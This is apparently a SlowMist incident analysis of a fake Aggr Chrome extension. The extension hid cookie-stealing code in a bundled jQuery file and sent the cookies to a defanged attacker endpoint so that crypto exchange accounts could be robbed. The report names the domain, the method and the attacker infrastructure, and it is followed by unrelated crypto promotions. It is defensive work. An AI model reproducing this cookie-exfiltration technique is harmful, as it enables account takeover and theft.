On March 1, 2024, according to feedback from Twitter user @doomxbt, an abnormal situation occurred with their Binance account, with funds suspected to have been stolen:
Initially, this incident did not attract much attention. However, on May 28, 2024, Twitter user @Tree_of_Alpha analyzed and discovered that the victim, @doomxbt, had likely installed a malicious Aggr extension from the Chrome store, which had many positive reviews! This extension could steal all cookies from the websites visited by the user, and two months ago, someone paid influencers to promote it.
Recently, attention to this incident has increased. Some victims had their login credentials stolen, and subsequently, hackers used these to steal the victims' cryptocurrency assets through coordinated attacks. Many users have consulted the SlowMist security team about this issue. Next, we will analyze this attack incident in detail to sound the alarm for the crypto community.
First, we need to locate this malicious extension. Although Google has already removed this malicious extension, we can still see some historical data through snapshot information.
After downloading and analyzing, the main JS files in the directory are background.js, content.js, jquery-3.6.0.min.js, and jquery-3.5.1.min.js.
During the static analysis, we found that background.js and content.js did not contain much complex code, nor did they have any obvious suspicious code logic. However, we found a site link in background.js, which sends data obtained by the plugin to https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
By analyzing the manifest.json file, we can see that background uses /jquery/jquery-3.6.0.min.js, and content uses /jquery/jquery-3.5.1.min.js. Therefore, we focused on analyzing these two jquery files:
In jquery/jquery-3.6.0.min.js, we found suspicious malicious code that processes the browser's cookies via JSON and sends them to the site: https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
After the static analysis, to more accurately analyze the behavior of the malicious extension in sending data, we began installing and debugging the extension. (Note: Analysis should be conducted in a brand-new testing environment with no logged-in accounts, and the malicious site should be changed to a controlled one to avoid sending sensitive data to the attacker's server during testing).
After installing the malicious extension in the test environment, we opened any website, such as google.com, and observed the network requests in the malicious extension background, finding that Google's cookie data was sent to an external server:
We also saw the cookies data sent by the malicious extension on the Weblog service:
At this point, if the attacker obtains user authentication credentials through the browser extension hijacking cookies, they can carry out coordinated attacks on some trading websites to steal users' cryptocurrency assets.
Next, we analyzed the malicious link https[:]//aggrtrade-extension[.]com/statistics_collection/index[.]php.
Involved domain: aggrtrade-extension[.]com
Parsing the domain information shown above:
.ru appears to be a typical Russian user, so it is highly likely to be a Russian or Eastern European hacker group.
Analyzing the fake AGGR (aggr.trade) malicious website aggrtrade-extension[.]com, we found that the hackers had been planning the attack for three years:
Four months ago, the hackers deployed the attack:
According to the InMist threat intelligence collaboration network, we found that the hacker's IP is located in Moscow, using a VPS provided by srvape.com, and the email is [email protected].
After successful deployment, the hackers began promoting on Twitter, waiting for victims to take the bait. The rest of the story is well known; some users installed the malicious extension and then were robbed.
Below is the official warning from AggrTrade:
The SlowMist security team reminds users that the risk of browser extensions is almost as great as running executable files directly, so be sure to thoroughly review them before installation. Also, be wary of people who send you private messages. Nowadays, hackers and scammers like to impersonate legitimate, well-known projects to scam content creators under the guise of sponsorship or promotion. Finally, always maintain a skeptical attitude while navigating the blockchain dark forest, ensuring that what you install is safe and not giving hackers any chance to exploit.
Tiger Trade, backed by UP Fintech, pioneers cryptocurrency trading in Hong Kong, offering a unified platform for traditional and crypto assets, enhancing the trading experience for investors. This strategic move reflects UP Fintech's commitment to staying at the forefront of the evolving financial landscape.
JoyOption2Trade (O2T) emerges as a strong contender in the crypto market, offering an AI-driven social trading platform in its presale phase. Positioned under $1, O2T competes with dYdX and Polygon, presenting a promising investment opportunity. With a focus on governance, versatility, and a attractively low presale price, O2T aims to disrupt the market and stands out as a potential top pick for investors in 2024.
Cheng Yuan
JinseFinanceJinseFinanceSBF and Zhu Su trade blows over alleged media control.
cryptopotatoThe UK’s FMI Sandbox would initially focus on DLT-based securities settlement systems.
Others
CointelegraphThe crypto exchange said it had $48 million in exposure with Babel Finance and $5 million with Celsius — both firms faced liquidity and insolvency issues, respectively.
CointelegraphDubai, UAE XT.COM, the world's most secured and socially infused exchange is proud to announce its partnership with Metatron Coin ...
BitcoinistINTERNET CITY, DUBAI, May. 24, 2022 – LBank Exchange, a global digital asset trading platform, will list TRADE on May ...
Bitcoinist